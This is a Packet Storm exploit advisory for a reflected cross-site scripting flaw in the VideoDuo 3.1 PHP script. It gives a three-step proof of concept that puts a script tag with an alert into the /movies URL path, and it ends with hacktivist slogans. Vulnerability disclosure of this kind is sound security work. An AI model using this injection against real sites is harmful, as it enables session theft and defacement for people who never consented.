VideoDuo 3.1 Cross Site Scripting

2018-01-06T00:00:00
ID PACKETSTORM:145723
Type packetstorm
Reporter ShanoWeb
Modified 2018-01-06T00:00:00

Description

                                        
                                            `# Exploit Title: VideoDuo - Video Search Engine PHP Script - xss  
# Google Dork: N/A  
# Date: 2018/06/01  
# Exploit Author: ShanoWeb  
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com  
# Vendor Homepage: https://ephp.site  
# Software Buy: https://www.codester.com/items/5031/videoduo-video-search-engine-php-script  
# Demo: http://script24.ephp.site  
# Version: 3.1  
# Tested on: Win7 x64  
# Exploit :  
  
Hi 2 All  
1. go to : http://[site]/movies  
2. insert to url -> http://[site]/movies/<script>alert(/ShanoWeb/);</script>  
3. Enter  
  
  
:D  
  
./  
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|  
| Find and patch bug in your website and system|  
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |  
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|  
  
|=============================================================|  
/-------------------------------------------------------------\  
| My Message To |  
\-------------------------------------------------------------/  
|= [!] Make Love,Not War!. Peace No War!  
|= [!] We Are One!  
|= [!] We are Legion,We do not Forgive,We Do not Forge  
|= [!] We Love All Children from Palestine  
|=============================================================|  
`